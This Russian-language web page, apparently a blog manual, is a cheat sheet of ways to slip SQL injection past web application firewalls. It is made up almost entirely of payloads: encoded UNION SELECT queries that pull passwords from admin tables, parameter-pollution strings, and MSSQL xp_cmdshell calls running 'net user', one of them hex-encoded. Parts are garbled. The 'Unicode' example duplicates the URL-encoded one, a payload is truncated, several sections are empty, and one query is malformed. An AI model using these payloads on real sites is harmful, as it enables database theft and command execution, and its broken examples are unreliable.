👨⚕️️ [SQL инъекция] Некоторые способы обхода WAF |
Главная » Мануал

👨⚕️️ [SQL инъекция] Некоторые способы обхода WAF

Мануал
На чтение 2 мин Опубликовано

Эта статья представляет собой краткое изложение о различных методах WAF, где  мы можем использовать следующие техники в тестовом обходе WAF.

Содержание
  1. Кодирование URL
  2. Кодирование Unicode
  3. Компрометация Http параметра  / обход комплексного параметра
  4. Обход изменения специальных символов
  5. Обход белого списка поисковой системы, обход прокси агента
  6. Метода обхода
  7. Обход кодирования (urlencoded / from-data) Обход с разделением ключевых слов
  8. Обход специального синтаксиса базы данных
  9. Используйте оператор комментария для обхода
  10. HEX обход
  11. Обход блокировки разрыва строки

Кодирование URL

Исходный пэйлоад:?id=1 union select pass from admin limit 1

Зашифрованный пэйлоад:id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%

Кодирование Unicode

Исходный пэйлоад:?id=1 union select pass from admin limit 1

Зашифрованный пэйлоад:id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%

Компрометация Http параметра  / обход комплексного параметра

?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18&id=19%20from%28admin%29%29
?id=1&id=1/**/And/**/1=2/**/Union/**/Select/**/1,concat%28database%28%29,0x3a,user%28%29,0x3a,version%28%29%29,3
?id=1 union select 1&id=pass from admin 

Обход изменения специальных символов

//%00 equivalent to NULL, null characters cut it, WAF parse url parameters in the time being cut off
replace spaces with /**/ And replaced with a %n%d, ;[NULL] ;%00 ;\x00, ||….

Обход белого списка поисковой системы, обход прокси агента

Метода обхода

Change GET to POST, POST to GET …
GET /id=1 union select 1,2,3,4 
POST id=1 union select 1,2,3,4

Обход кодирования (urlencoded / from-data)
Обход с разделением ключевых слов

?id=1;EXEC(‘ma’+’ster..x’+’p_cm’+’dsh’+’ell “net user”‘)

Обход специального синтаксиса базы данных

?id=1.union%0aselect@1,2 ,!3,4  

Используйте оператор комментария для обхода

UNION /**/ Select /**/user,pwd,from tbluser

HEX обход

0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)
?id=1;declare%20@a%20sysname%20select @a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 exec master.dbo.xp_cmdshell @a;–

Обход блокировки разрыва строки

?id=-11%0Aunion%0Aselect 1,2,3,4

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

SQL-инъекция SQli waf
Пожалуйста, не спамьте и никого не оскорбляйте. Это поле для комментариев, а не спамбокс. Рекламные ссылки не индексируются!
Добавить комментарий